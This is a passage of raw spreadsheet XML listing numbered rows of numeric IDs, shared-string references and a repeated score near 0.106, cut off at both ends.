        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31569" ht="15.75" customHeight="1">
      <c r="A31569" s="1">
        <v>18490.0</v>
      </c>
      <c r="B31569" s="2">
        <v>5.2912202E7</v>
      </c>
      <c r="C31569" s="2" t="s">
        <v>30361</v>
      </c>
      <c r="D31569" s="2">
        <v>1.0</v>
      </c>
      <c r="E31569" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31569" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31570" ht="15.75" customHeight="1">
      <c r="A31570" s="1">
        <v>18668.0</v>
      </c>
      <c r="B31570" s="2">
        <v>5.3541714E7</v>
      </c>
      <c r="C31570" s="2" t="s">
        <v>30362</v>
      </c>
      <c r="D31570" s="2">
        <v>1.0</v>
      </c>
      <c r="E31570" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31570" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31571" ht="15.75" customHeight="1">
      <c r="A31571" s="1">
        <v>18791.0</v>
      </c>
      <c r="B31571" s="2">
        <v>5382895.0</v>
      </c>
      <c r="C31571" s="2" t="s">
        <v>30363</v>
      </c>
      <c r="D31571" s="2">
        <v>1.0</v>
      </c>
      <c r="E31571" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31571" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31572" ht="15.75" customHeight="1">
      <c r="A31572" s="1">
        <v>19018.0</v>
      </c>
      <c r="B31572" s="2">
        <v>5.4525015E7</v>
      </c>
      <c r="C31572" s="2" t="s">
        <v>30364</v>
      </c>
      <c r="D31572" s="2">
        <v>1.0</v>
      </c>
      <c r="E31572" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31572" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31573" ht="15.75" customHeight="1">
      <c r="A31573" s="1">
        <v>20557.0</v>
      </c>
      <c r="B31573" s="2">
        <v>1.3389347E7</v>
      </c>
      <c r="C31573" s="2" t="s">
        <v>30365</v>
      </c>
      <c r="D31573" s="2">
        <v>1.0</v>
      </c>
      <c r="E31573" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31573" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31574" ht="15.75" customHeight="1">
      <c r="A31574" s="1">
        <v>20994.0</v>
      </c>
      <c r="B31574" s="2">
        <v>1.7116371E7</v>
      </c>
      <c r="C31574" s="2" t="s">
        <v>30366</v>
      </c>
      <c r="D31574" s="2">
        <v>1.0</v>
      </c>
      <c r="E31574" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31574" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31575" ht="15.75" customHeight="1">
      <c r="A31575" s="1">
        <v>21361.0</v>
      </c>
      <c r="B31575" s="2">
        <v>2.1449413E7</v>
      </c>
      <c r="C31575" s="2" t="s">
        <v>30367</v>
      </c>
      <c r="D31575" s="2">
        <v>1.0</v>
      </c>
      <c r="E31575" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31575" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31576" ht="15.75" customHeight="1">
      <c r="A31576" s="1">
        <v>21505.0</v>
      </c>
      <c r="B31576" s="2">
        <v>2.3132797E7</v>
      </c>
      <c r="C31576" s="2" t="s">
        <v>30368</v>
      </c>
      <c r="D31576" s="2">
        <v>1.0</v>
      </c>
      <c r="E31576" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31576" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31577" ht="15.75" customHeight="1">
      <c r="A31577" s="1">
        <v>21559.0</v>
      </c>
      <c r="B31577" s="2">
        <v>2.3670969E7</v>
      </c>
      <c r="C31577" s="2" t="s">
        <v>30369</v>
      </c>
      <c r="D31577" s="2">
        <v>1.0</v>
      </c>
      <c r="E31577" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31577" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31578" ht="15.75" customHeight="1">
      <c r="A31578" s="1">
        <v>21634.0</v>
      </c>
      <c r="B31578" s="2">
        <v>2.4665697E7</v>
      </c>
      <c r="C31578" s="2" t="s">
        <v>30370</v>
      </c>
      <c r="D31578" s="2">
        <v>1.0</v>
      </c>
      <c r="E31578" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31578" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31579" ht="15.75" customHeight="1">
      <c r="A31579" s="1">
        <v>24418.0</v>
      </c>
      <c r="B31579" s="2">
        <v>1.0842768E7</v>
      </c>
      <c r="C31579" s="2" t="s">
        <v>30371</v>
      </c>
      <c r="D31579" s="2">
        <v>1.0</v>
      </c>
      <c r="E31579" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31579" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31580" ht="15.75" customHeight="1">
      <c r="A31580" s="1">
        <v>25265.0</v>
      </c>
      <c r="B31580" s="2">
        <v>1.3389346E7</v>
      </c>
      <c r="C31580" s="2" t="s">
        <v>30372</v>
      </c>
      <c r="D31580" s="2">
        <v>1.0</v>
      </c>
      <c r="E31580" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31580" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31581" ht="15.75" customHeight="1">
      <c r="A31581" s="1">
        <v>25446.0</v>
      </c>
      <c r="B31581" s="2">
        <v>1.3930133E7</v>
      </c>
      <c r="C31581" s="2" t="s">
        <v>30373</v>
      </c>
      <c r="D31581" s="2">
        <v>1.0</v>
      </c>
      <c r="E31581" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31581" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31582" ht="15.75" customHeight="1">
      <c r="A31582" s="1">
        <v>26413.0</v>
      </c>
      <c r="B31582" s="2">
        <v>1.711637E7</v>
      </c>
      <c r="C31582" s="2" t="s">
        <v>30366</v>
      </c>
      <c r="D31582" s="2">
        <v>1.0</v>
      </c>
      <c r="E31582" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31582" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31583" ht="15.75" customHeight="1">
      <c r="A31583" s="1">
        <v>27448.0</v>
      </c>
      <c r="B31583" s="2">
        <v>2.1985013E7</v>
      </c>
      <c r="C31583" s="2" t="s">
        <v>30374</v>
      </c>
      <c r="D31583" s="2">
        <v>1.0</v>
      </c>
      <c r="E31583" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31583" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31584" ht="15.75" customHeight="1">
      <c r="A31584" s="1">
        <v>27900.0</v>
      </c>
      <c r="B31584" s="2">
        <v>2.3670968E7</v>
      </c>
      <c r="C31584" s="2" t="s">
        <v>30369</v>
      </c>
      <c r="D31584" s="2">
        <v>1.0</v>
      </c>
      <c r="E31584" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31584" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31585" ht="15.75" customHeight="1">
      <c r="A31585" s="1">
        <v>28659.0</v>
      </c>
      <c r="B31585" s="2">
        <v>2.7410363E7</v>
      </c>
      <c r="C31585" s="2" t="s">
        <v>30375</v>
      </c>
      <c r="D31585" s="2">
        <v>1.0</v>
      </c>
      <c r="E31585" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31585" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31586" ht="15.75" customHeight="1">
      <c r="A31586" s="1">
        <v>29811.0</v>
      </c>
      <c r="B31586" s="2">
        <v>3.5198272E7</v>
      </c>
      <c r="C31586" s="2" t="s">
        <v>30376</v>
      </c>
      <c r="D31586" s="2">
        <v>1.0</v>
      </c>
      <c r="E31586" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31586" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31587" ht="15.75" customHeight="1">
      <c r="A31587" s="1">
        <v>33731.0</v>
      </c>
      <c r="B31587" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C31587" s="2" t="s">
        <v>30377</v>
      </c>
      <c r="D31587" s="2">
        <v>1.0</v>
      </c>
      <c r="E31587" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31587" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31588" ht="15.75" customHeight="1">
      <c r="A31588" s="1">
        <v>33787.0</v>
      </c>
      <c r="B31588" s="2">
        <v>8750701.0</v>
      </c>
      <c r="C31588" s="2" t="s">
        <v>30378</v>
      </c>
      <c r="D31588" s="2">
        <v>1.0</v>
      </c>
      <c r="E31588" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31588" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31589" ht="15.75" customHeight="1">
      <c r="A31589" s="1">
        <v>34142.0</v>
      </c>
      <c r="B31589" s="2">
        <v>9825383.0</v>
      </c>
      <c r="C31589" s="2" t="s">
        <v>30379</v>
      </c>
      <c r="D31589" s="2">
        <v>1.0</v>
      </c>
      <c r="E31589" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31589" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31590" ht="15.75" customHeight="1">
      <c r="A31590" s="1">
        <v>4859.0</v>
      </c>
      <c r="B31590" s="2">
        <v>4.3792092E7</v>
      </c>
      <c r="C31590" s="2" t="s">
        <v>30380</v>
      </c>
      <c r="D31590" s="2">
        <v>1.0</v>
      </c>
      <c r="E31590" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31590" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31591" ht="15.75" customHeight="1">
      <c r="A31591" s="1">
        <v>4904.0</v>
      </c>
      <c r="B31591" s="2">
        <v>4.3917742E7</v>
      </c>
      <c r="C31591" s="2" t="s">
        <v>30381</v>
      </c>
      <c r="D31591" s="2">
        <v>1.0</v>
      </c>
      <c r="E31591" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31591" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31592" ht="15.75" customHeight="1">
      <c r="A31592" s="1">
        <v>6117.0</v>
      </c>
      <c r="B31592" s="2">
        <v>4.7782884E7</v>
      </c>
      <c r="C31592" s="2" t="s">
        <v>30382</v>
      </c>
      <c r="D31592" s="2">
        <v>1.0</v>
      </c>
      <c r="E31592" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31592" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31593" ht="15.75" customHeight="1">
      <c r="A31593" s="1">
        <v>6250.0</v>
      </c>
      <c r="B31593" s="2">
        <v>4.8105197E7</v>
      </c>
      <c r="C31593" s="2" t="s">
        <v>30383</v>
      </c>
      <c r="D31593" s="2">
        <v>1.0</v>
      </c>
      <c r="E31593" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31593" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31594" ht="15.75" customHeight="1">
      <c r="A31594" s="1">
        <v>6370.0</v>
      </c>
      <c r="B31594" s="2">
        <v>4.8378016E7</v>
      </c>
      <c r="C31594" s="2" t="s">
        <v>30384</v>
      </c>
      <c r="D31594" s="2">
        <v>1.0</v>
      </c>
      <c r="E31594" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31594" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31595" ht="15.75" customHeight="1">
      <c r="A31595" s="1">
        <v>7754.0</v>
      </c>
      <c r="B31595" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C31595" s="2" t="s">
        <v>30385</v>
      </c>
      <c r="D31595" s="2">
        <v>1.0</v>
      </c>
      <c r="E31595" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31595" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31596" ht="15.75" customHeight="1">
      <c r="A31596" s="1">
        <v>9322.0</v>
      </c>
      <c r="B31596" s="2">
        <v>5.5581647E7</v>
      </c>
      <c r="C31596" s="2" t="s">
        <v>30386</v>
      </c>
      <c r="D31596" s="2">
        <v>1.0</v>
      </c>
      <c r="E31596" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31596" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31597" ht="15.75" customHeight="1">
      <c r="A31597" s="1">
        <v>9921.0</v>
      </c>
      <c r="B31597" s="2">
        <v>5.6818173E7</v>
      </c>
      <c r="C31597" s="2" t="s">
        <v>30387</v>
      </c>
      <c r="D31597" s="2">
        <v>1.0</v>
      </c>
      <c r="E31597" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31597" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31598" ht="15.75" customHeight="1">
      <c r="A31598" s="1">
        <v>10422.0</v>
      </c>
      <c r="B31598" s="2">
        <v>1.03198E7</v>
      </c>
      <c r="C31598" s="2" t="s">
        <v>30388</v>
      </c>
      <c r="D31598" s="2">
        <v>1.0</v>
      </c>
      <c r="E31598" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31598" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31599" ht="15.75" customHeight="1">
      <c r="A31599" s="1">
        <v>11827.0</v>
      </c>
      <c r="B31599" s="2">
        <v>2.4645107E7</v>
      </c>
      <c r="C31599" s="2" t="s">
        <v>30389</v>
      </c>
      <c r="D31599" s="2">
        <v>1.0</v>
      </c>
      <c r="E31599" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31599" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31600" ht="15.75" customHeight="1">
      <c r="A31600" s="1">
        <v>13011.0</v>
      </c>
      <c r="B31600" s="2">
        <v>3.2881881E7</v>
      </c>
      <c r="C31600" s="2" t="s">
        <v>30390</v>
      </c>
      <c r="D31600" s="2">
        <v>1.0</v>
      </c>
      <c r="E31600" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31600" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31601" ht="15.75" customHeight="1">
      <c r="A31601" s="1">
        <v>13359.0</v>
      </c>
      <c r="B31601" s="2">
        <v>3.4777154E7</v>
      </c>
      <c r="C31601" s="2" t="s">
        <v>30391</v>
      </c>
      <c r="D31601" s="2">
        <v>1.0</v>
      </c>
      <c r="E31601" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31601" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31602" ht="15.75" customHeight="1">
      <c r="A31602" s="1">
        <v>13991.0</v>
      </c>
      <c r="B31602" s="2">
        <v>3.7376808E7</v>
      </c>
      <c r="C31602" s="2" t="s">
        <v>30392</v>
      </c>
      <c r="D31602" s="2">
        <v>1.0</v>
      </c>
      <c r="E31602" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31602" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31603" ht="15.75" customHeight="1">
      <c r="A31603" s="1">
        <v>14116.0</v>
      </c>
      <c r="B31603" s="2">
        <v>3.778507E7</v>
      </c>
      <c r="C31603" s="2" t="s">
        <v>30393</v>
      </c>
      <c r="D31603" s="2">
        <v>1.0</v>
      </c>
      <c r="E31603" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31603" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31604" ht="15.75" customHeight="1">
      <c r="A31604" s="1">
        <v>14329.0</v>
      </c>
      <c r="B31604" s="2">
        <v>3.8751663E7</v>
      </c>
      <c r="C31604" s="2" t="s">
        <v>30394</v>
      </c>
      <c r="D31604" s="2">
        <v>1.0</v>
      </c>
      <c r="E31604" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31604" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31605" ht="15.75" customHeight="1">
      <c r="A31605" s="1">
        <v>14611.0</v>
      </c>
      <c r="B31605" s="2">
        <v>4.0251639E7</v>
      </c>
      <c r="C31605" s="2" t="s">
        <v>30395</v>
      </c>
      <c r="D31605" s="2">
        <v>1.0</v>
      </c>
      <c r="E31605" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31605" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31606" ht="15.75" customHeight="1">
      <c r="A31606" s="1">
        <v>16268.0</v>
      </c>
      <c r="B31606" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C31606" s="2" t="s">
        <v>30396</v>
      </c>
      <c r="D31606" s="2">
        <v>1.0</v>
      </c>
      <c r="E31606" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31606" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31607" ht="15.75" customHeight="1">
      <c r="A31607" s="1">
        <v>18243.0</v>
      </c>
      <c r="B31607" s="2">
        <v>5.2144673E7</v>
      </c>
      <c r="C31607" s="2" t="s">
        <v>30397</v>
      </c>
      <c r="D31607" s="2">
        <v>1.0</v>
      </c>
      <c r="E31607" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31607" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31608" ht="15.75" customHeight="1">
      <c r="A31608" s="1">
        <v>18592.0</v>
      </c>
      <c r="B31608" s="2">
        <v>5.3258408E7</v>
      </c>
      <c r="C31608" s="2" t="s">
        <v>30398</v>
      </c>
      <c r="D31608" s="2">
        <v>1.0</v>
      </c>
      <c r="E31608" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31608" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31609" ht="15.75" customHeight="1">
      <c r="A31609" s="1">
        <v>18849.0</v>
      </c>
      <c r="B31609" s="2">
        <v>5.3980856E7</v>
      </c>
      <c r="C31609" s="2" t="s">
        <v>30399</v>
      </c>
      <c r="D31609" s="2">
        <v>1.0</v>
      </c>
      <c r="E31609" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31609" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31610" ht="15.75" customHeight="1">
      <c r="A31610" s="1">
        <v>19366.0</v>
      </c>
      <c r="B31610" s="2">
        <v>5.5468669E7</v>
      </c>
      <c r="C31610" s="2" t="s">
        <v>30400</v>
      </c>
      <c r="D31610" s="2">
        <v>1.0</v>
      </c>
      <c r="E31610" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31610" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31611" ht="15.75" customHeight="1">
      <c r="A31611" s="1">
        <v>20556.0</v>
      </c>
      <c r="B31611" s="2">
        <v>1.3389347E7</v>
      </c>
      <c r="C31611" s="2" t="s">
        <v>30401</v>
      </c>
      <c r="D31611" s="2">
        <v>1.0</v>
      </c>
      <c r="E31611" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31611" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31612" ht="15.75" customHeight="1">
      <c r="A31612" s="1">
        <v>23560.0</v>
      </c>
      <c r="B31612" s="2">
        <v>6146673.0</v>
      </c>
      <c r="C31612" s="2" t="s">
        <v>30402</v>
      </c>
      <c r="D31612" s="2">
        <v>1.0</v>
      </c>
      <c r="E31612" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31612" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31613" ht="15.75" customHeight="1">
      <c r="A31613" s="1">
        <v>23814.0</v>
      </c>
      <c r="B31613" s="2">
        <v>7965566.0</v>
      </c>
      <c r="C31613" s="2" t="s">
        <v>30403</v>
      </c>
      <c r="D31613" s="2">
        <v>1.0</v>
      </c>
      <c r="E31613" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31613" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31614" ht="15.75" customHeight="1">
      <c r="A31614" s="1">
        <v>24905.0</v>
      </c>
      <c r="B31614" s="2">
        <v>1.2310392E7</v>
      </c>
      <c r="C31614" s="2" t="s">
        <v>30404</v>
      </c>
      <c r="D31614" s="2">
        <v>1.0</v>
      </c>
      <c r="E31614" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31614" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31615" ht="15.75" customHeight="1">
      <c r="A31615" s="1">
        <v>26053.0</v>
      </c>
      <c r="B31615" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C31615" s="2" t="s">
        <v>30405</v>
      </c>
      <c r="D31615" s="2">
        <v>1.0</v>
      </c>
      <c r="E31615" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31615" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31616" ht="15.75" customHeight="1">
      <c r="A31616" s="1">
        <v>27452.0</v>
      </c>
      <c r="B31616" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C31616" s="2" t="s">
        <v>30406</v>
      </c>
      <c r="D31616" s="2">
        <v>1.0</v>
      </c>
      <c r="E31616" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31616" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31617" ht="15.75" customHeight="1">
      <c r="A31617" s="1">
        <v>29673.0</v>
      </c>
      <c r="B31617" s="2">
        <v>3.3991944E7</v>
      </c>
      <c r="C31617" s="2" t="s">
        <v>30407</v>
      </c>
      <c r="D31617" s="2">
        <v>1.0</v>
      </c>
      <c r="E31617" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31617" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31618" ht="15.75" customHeight="1">
      <c r="A31618" s="1">
        <v>30131.0</v>
      </c>
      <c r="B31618" s="2">
        <v>3.6998292E7</v>
      </c>
      <c r="C31618" s="2" t="s">
        <v>30408</v>
      </c>
      <c r="D31618" s="2">
        <v>1.0</v>
      </c>
      <c r="E31618" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31618" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31619" ht="15.75" customHeight="1">
      <c r="A31619" s="1">
        <v>30507.0</v>
      </c>
      <c r="B31619" s="2">
        <v>4.0038826E7</v>
      </c>
      <c r="C31619" s="2" t="s">
        <v>30409</v>
      </c>
      <c r="D31619" s="2">
        <v>1.0</v>
      </c>
      <c r="E31619" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31619" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31620" ht="15.75" customHeight="1">
      <c r="A31620" s="1">
        <v>30949.0</v>
      </c>
      <c r="B31620" s="2">
        <v>4.7336868E7</v>
      </c>
      <c r="C31620" s="2" t="s">
        <v>30410</v>
      </c>
      <c r="D31620" s="2">
        <v>1.0</v>
      </c>
      <c r="E31620" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31620" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31621" ht="15.75" customHeight="1">
      <c r="A31621" s="1">
        <v>31796.0</v>
      </c>
      <c r="B31621" s="2">
        <v>5237006.0</v>
      </c>
      <c r="C31621" s="2" t="s">
        <v>30411</v>
      </c>
      <c r="D31621" s="2">
        <v>1.0</v>
      </c>
      <c r="E31621" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31621" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31622" ht="15.75" customHeight="1">
      <c r="A31622" s="1">
        <v>32340.0</v>
      </c>
      <c r="B31622" s="2">
        <v>5591397.0</v>
      </c>
      <c r="C31622" s="2" t="s">
        <v>30412</v>
      </c>
      <c r="D31622" s="2">
        <v>1.0</v>
      </c>
      <c r="E31622" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31622" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="31623" ht="15.75" customHeight="1">
      <c r="A31623" s="1">
        <v>3752.0</v>
      </c>
      <c r="B31623" s="2">
        <v>3.971983E7</v>
      </c>
      <c r="C31623" s="2" t="s">
        <v>30413</v>
      </c>
      <c r="D31623" s="2">
        <v>1.0</v>
      </c>
      <c r="E31623" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31623" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31624" ht="15.75" customHeight="1">
      <c r="A31624" s="1">
        <v>10608.0</v>
      </c>
      <c r="B31624" s="2">
        <v>1.3672052E7</v>
      </c>
      <c r="C31624" s="2" t="s">
        <v>30414</v>
      </c>
      <c r="D31624" s="2">
        <v>1.0</v>
      </c>
      <c r="E31624" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31624" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31625" ht="15.75" customHeight="1">
      <c r="A31625" s="1">
        <v>12694.0</v>
      </c>
      <c r="B31625" s="2">
        <v>3.0752034E7</v>
      </c>
      <c r="C31625" s="2" t="s">
        <v>30415</v>
      </c>
      <c r="D31625" s="2">
        <v>1.0</v>
      </c>
      <c r="E31625" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31625" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31626" ht="15.75" customHeight="1">
      <c r="A31626" s="1">
        <v>13599.0</v>
      </c>
      <c r="B31626" s="2">
        <v>3.5784665E7</v>
      </c>
      <c r="C31626" s="2" t="s">
        <v>30416</v>
      </c>
      <c r="D31626" s="2">
        <v>1.0</v>
      </c>
      <c r="E31626" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31626" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31627" ht="15.75" customHeight="1">
      <c r="A31627" s="1">
        <v>16809.0</v>
      </c>
      <c r="B31627" s="2">
        <v>4.7815711E7</v>
      </c>
      <c r="C31627" s="2" t="s">
        <v>30417</v>
      </c>
      <c r="D31627" s="2">
        <v>1.0</v>
      </c>
      <c r="E31627" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31627" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31628" ht="15.75" customHeight="1">
      <c r="A31628" s="1">
        <v>19526.0</v>
      </c>
      <c r="B31628" s="2">
        <v>5.5977992E7</v>
      </c>
      <c r="C31628" s="2" t="s">
        <v>30418</v>
      </c>
      <c r="D31628" s="2">
        <v>1.0</v>
      </c>
      <c r="E31628" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31628" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31629" ht="15.75" customHeight="1">
      <c r="A31629" s="1">
        <v>19597.0</v>
      </c>
      <c r="B31629" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C31629" s="2" t="s">
        <v>30419</v>
      </c>
      <c r="D31629" s="2">
        <v>1.0</v>
      </c>
      <c r="E31629" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31629" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="31630" ht="15.75" customHeight="1">
      <c r="A31630" s="1">
        <v>1032.0</v>
      </c>
      <c r="B31630" s="2">
        <v>2.3199822E7</v>
      </c>
      <c r="C31630" s="2" t="s">
        <v>30420</v>
      </c>
      <c r="D31630" s="2">
        <v>1.0</v>
      </c>
      <c r="E31630" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31630" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="31631" ht="15.75" customHeight="1">
      <c r="A31631" s="1">
        <v>12719.0</v>
      </c>
      <c r="B31631" s="2">
        <v>3.0868136E7</v>
      </c>
      <c r="C31631" s="2" t="s">
        <v>30421</v>
      </c>
      <c r="D31631" s="2">
        <v>1.0</v>
      </c>
      <c r="E31631" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31631" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="31632" ht="15.75" customHeight="1">
      <c r="A31632" s="1">
        <v>19202.0</v>
      </c>
      <c r="B31632" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C31632" s="2" t="s">
        <v>30422</v>
      </c>
      <c r="D31632" s="2">
        <v>1.0</v>
      </c>
      <c r="E31632" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31632" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="31633" ht="15.75" customHeight="1">
      <c r="A31633" s="1">
        <v>25979.0</v>
      </c>
      <c r="B31633" s="2">
        <v>1.52925E7</v>
      </c>
      <c r="C31633" s="2" t="s">
        <v>30423</v>
      </c>
      <c r="D31633" s="2">
        <v>1.0</v>
      </c>
      <c r="E31633" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31633" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="31634" ht="15.75" customHeight="1">
      <c r="A31634" s="1">
        <v>1960.0</v>
      </c>
      <c r="B31634" s="2">
        <v>3.0313769E7</v>
      </c>
      <c r="C31634" s="2" t="s">
        <v>30424</v>
      </c>
      <c r="D31634" s="2">
        <v>1.0</v>
      </c>
      <c r="E31634" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31634" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="31635" ht="15.75" customHeight="1">
      <c r="A31635" s="1">
        <v>5988.0</v>
      </c>
      <c r="B31635" s="2">
        <v>4.7410403E7</v>
      </c>
      <c r="C31635" s="2" t="s">
        <v>30425</v>
      </c>
      <c r="D31635" s="2">
        <v>1.0</v>
      </c>
      <c r="E31635" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31635" s="2">
